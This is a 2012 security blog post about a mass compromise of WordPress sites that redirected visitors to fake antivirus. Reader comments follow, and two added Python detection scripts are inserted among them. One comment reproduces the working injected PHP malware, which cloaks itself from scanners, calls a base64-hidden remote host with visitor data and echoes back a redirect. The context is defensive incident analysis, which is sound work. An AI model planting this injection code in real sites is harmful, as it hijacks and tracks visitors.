Latest Mass Compromise of WordPress sites – More Details

March 8, 2012, by Daniel Cid


We are getting lots of questions about the latest mass compromise targeting WordPress sites (redirecting visitors to fake AV), which has affected over 30,000 domains.

The first question is: how are these sites getting hacked? In all the cases we analysed, the site either had an outdated version of WordPress or an outdated plugin. We can safely rule out any new vulnerability in WordPress itself.

We also posted about it a week ago when we detected this malware campaign using .rr.nu domains.

As we promised in the previous post, this is an update to what we are seeing.

More Details

  • The malicious domains are still pointing to 194.28.114.103 and 194.28.114.102 (the same IPs used by the group behind the sweepstakesandcontestsdo.com and infoitpoweringgathering.com attacks)
  • More than 200 different .rr.nu domains are being used
  • We have identified more than 500 variations of the injected URL, pointing to random domain names in the .rr.nu TLD:

—

If you’re not sure whether you’re infected, do a free website malware scan using SiteCheck.


Categories: Website Malware Infections, WordPress Security

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid


Comments

  1. Jobe Bittman

    March 8, 2012

    I couldn’t get an affected WordPress server to give me the bad link without using a Chrome Macintosh user-agent in my wget request. Once you do, it looks like it’s clickjacking to a pay-per-click site and redirecting out to google.com. I’m guessing the OSX clicks pay more.

    • Four Season

      March 11, 2012

      This is my web site:
      http://fourseasonnews.blogspot.com/

  2. MacAmbulance

    March 9, 2012

    The web logs from my affected host show this:

    64.15.78.203 - - [04/Mar/2012:23:21:20 +0000] "GET /wp-login.php HTTP/1.1" 200 3430 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:21 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:24 +0000] "GET /wp-admin/ HTTP/1.1" 200 69832 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:37 +0000] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 50722 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:42 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 200 51117 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:46 +0000] "GET /wp-admin/theme-editor.php?file=%2Fthemes%2Fboxpark%2Farchive.php&theme=Boxpark%2Fboxpark&dir=theme HTTP/1.1" 200 41820 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"

    Unless I’m wrong, it looks like someone posted some data to wp-login.php and was granted immediate access. All our passwords are secure so perhaps the SQL Server was hacked?
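A detection check for the sequence in this log excerpt, added here as an example and not part of the comment or of Sucuri's tooling: it parses combined-format access log lines (constructed samples modelled on the lines above, user agents shortened) and flags any client whose successful POST to wp-login.php is followed within a few minutes by a POST to theme-editor.php, the dashboard path through which the theme file was rewritten.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log lines modelled on the excerpt in the comment: one
# client logs in and writes a theme file seconds later, a second client's
# login and edit are hours apart. Not real log data.
SAMPLE_LOG = """\
64.15.78.203 - - [04/Mar/2012:23:21:20 +0000] "GET /wp-login.php HTTP/1.1" 200 3430 "-" "Mozilla/5.0"
64.15.78.203 - - [04/Mar/2012:23:21:21 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
64.15.78.203 - - [04/Mar/2012:23:21:37 +0000] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 50722 "-" "Mozilla/5.0"
64.15.78.203 - - [04/Mar/2012:23:21:42 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 200 51117 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Mar/2012:23:30:00 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.5 - - [05/Mar/2012:09:00:00 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 200 51117 "-" "Mozilla/5.0"
"""

# The fields of the Apache/nginx combined log format that the check needs.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the ?file=...&theme=... query
    return rec

def find_theme_editor_abuse(log_text, window=timedelta(minutes=5)):
    """Return (ip, login_ts, edit_ts) for each client whose successful login
    (POST /wp-login.php answered with a 302) is followed within `window` by a
    POST to theme-editor.php, i.e. a theme file saved through the dashboard."""
    last_login = {}
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"] == "/wp-login.php" and rec["status"] == "302":
            last_login[rec["ip"]] = rec["ts"]
        elif rec["path"] == "/wp-admin/theme-editor.php":
            login_ts = last_login.get(rec["ip"])
            if login_ts is not None and rec["ts"] - login_ts <= window:
                hits.append((rec["ip"], login_ts, rec["ts"]))
    return hits

if __name__ == "__main__":
    for ip, t0, t1 in find_theme_editor_abuse(SAMPLE_LOG):
        print(f"{ip}: login {t0:%H:%M:%S} -> theme-editor POST {t1:%H:%M:%S}")
```

A hit does not prove a stolen password on its own, but an editor save seconds after a login from an unfamiliar IP is the trail to check against the modified theme file's timestamp.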

  3. FirstRentals

    March 9, 2012

    How to get rid of this malware? Even some of my websites are affected.

  4. Oylesinetakilmaca

    March 9, 2012

    I’m following you on this problem. All my WordPress websites are infected. I opened them without deleting FTP cookies. The iframe code is changing but is the same on all websites. I can’t find it anywhere.


  5. Four Season

    March 11, 2012

    Nice in The new post
    i like…this my web visit problem
    http://fourseasonnews.blogspot.com/

  6. Joseph Levin

    March 16, 2012

    I do not believe that this, in all cases, is a TimThumb exploit. Every client I have that is running WordPress got hacked in the last few days. My website was hacked, and I keep WP and the plugins and themes updated. Similarly, I use .htaccess and php.ini directives, as well as mods to WordPress itself to help. None of my themes had the TimThumb code present. Neither did WordPress itself.

    It does seem like it is a WordPress ‘related’ exploit (but not specifically the Blog installed all by itself). The vulnerability present has not come to light through my direct searching or searching for answers on the ‘net.

    I will say this- from a site I know has been hacked that I have not as yet had time to clean, the SiteCheck tool (shown in the post, above) does not find the malicious code, nor the vulnerability.

    I’m at a loss as to what to do beyond the ‘scorched earth’ approach, which is definitely not practical under many situations.

    At any rate, here is the malicious code, without its opening and closing PHP tags-

    CODE BEGINS-
    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1; // guard so the injected block runs once per request even if several files carry it
        // This code use for global bot statistic   (attacker's own comment)
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google search bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        // Cloaking: the remote call is skipped for search-engine crawlers and for the
        // browsers listed here, so scanners and most site owners never see the payload
        if ((strstr($sUserAgent, 'google') == false)
            && (strstr($sUserAgent, 'yahoo') == false)
            && (strstr($sUserAgent, 'baidu') == false)
            && (strstr($sUserAgent, 'msn') == false)
            && (strstr($sUserAgent, 'opera') == false)
            && (strstr($sUserAgent, 'chrome') == false)
            && (strstr($sUserAgent, 'bing') == false)
            && (strstr($sUserAgent, 'safari') == false)
            && (strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create bot analitics
                // The base64 literal hides the remote "stat" endpoint; the visitor's IP, user agent,
                // host and requested path are reported to it on every eligible page view
                $stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')
                    . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                    . '&useragent=' . urlencode($sUserAgent)
                    . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                    . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                    . '&check=' . isset($_GET['look']);
                $stCurlHandle = curl_init($stCurlLink);
            }
        }
        if ($stCurlHandle !== NULL)
        {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            $sResult = @curl_exec($stCurlHandle); // errors suppressed, so a dead endpoint leaves no trace
            // When the remote server answers with a body starting with "O", that marker byte is
            // blanked and the rest of the response (the injected redirect) is echoed into the page
            if ($sResult[0] == "O")
            {
                $sResult[0] = " ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    CODE ENDS

    Any help anyone can give in how to fix the exploit, or otherwise neutralize it would be greatly appreciated.

    Thank you all for your time.

  7. Eric

    March 24, 2012

    This hack infects every PHP file on your server with “eval(base64_decode(…”. In WordPress installs, it appears to inject a bunch of nl.php links into the comments table (just search your database for nl.php and it will return the infections). I purged the offending records from the database, replaced the entire site with clean PHP, reset all usernames and passwords (including MySQL and FTP), and that seemed to fix it... for a couple of days. Now it appears to be back, even though everything appears to still be clean (no eval in the PHP files, no nl.php in the database, etc.). Anyone have ideas where else to check?
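A file-content scanner for the two injection forms described in the last two comments (the $sRetry/curl "statistic" snippet Joseph posted and the eval(base64_decode( form Eric mentions), added here as an example that is not code from the page or from Sucuri. The sample file contents are constructed; the base64 literal is the one from the snippet above, and the scanner decodes it to show the remote stat URL it hides.

```python
import base64
import re

# Constructed file contents standing in for a WordPress tree (not real infected
# files): one carries the $sRetry/curl injection quoted above, one the
# eval(base64_decode( form, one is clean.
SAMPLE_FILES = {
    "wp-content/themes/boxpark/archive.php": (
        "if (!isset($sRetry)) { global $sRetry; $sRetry = 1;\n"
        "$stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')"
        ".'?ip='.urlencode($_SERVER['REMOTE_ADDR']); }"
    ),
    "wp-includes/load.php": "<?php eval(base64_decode('ZWNobyAnaGVsbG8nOw==')); ?>",
    "index.php": "<?php require 'wp-blog-header.php'; ?>",
}

# Signatures for the two injection forms described in the comments.
SIGNATURES = {
    "sRetry_curl_stat": re.compile(r"isset\(\$sRetry\).*?\$stCurlLink", re.S),
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
}
# A quoted base64 literal passed straight to base64_decode(); short ones are skipped.
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")

def decode_b64_literals(src):
    """Decode every literal handed to base64_decode() so the hidden URL or
    code can be read; binary or malformed literals are reported as such."""
    decoded = []
    for lit in B64_ARG.findall(src):
        try:
            decoded.append(base64.b64decode(lit, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<undecodable>")
    return decoded

def scan_source(src):
    """Return {'signatures': [matched names], 'decoded': [payload strings]}."""
    names = [name for name, rx in SIGNATURES.items() if rx.search(src)]
    return {"signatures": names, "decoded": decode_b64_literals(src)}

def scan_tree(files):
    """Map path -> findings for every file that triggers a signature or
    carries a base64 literal worth inspecting."""
    report = {}
    for path, src in files.items():
        findings = scan_source(src)
        if findings["signatures"] or findings["decoded"]:
            report[path] = findings
    return report

if __name__ == "__main__":
    for path, findings in scan_tree(SAMPLE_FILES).items():
        print(path, findings)
```

On a real host, feed scan_tree a dict built by reading every .php file under the web root; a reinfection after cleaning, as Eric describes, usually means a file outside the scanned tree or a database row is re-seeding the code.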

  8. Michael

    April 5, 2012

    This site has a script that worked for me to clean off the infection!
    http://www.spkaa.com/3-step-fix-for-your-rr-nu-wordpress-virus-outbreak
     
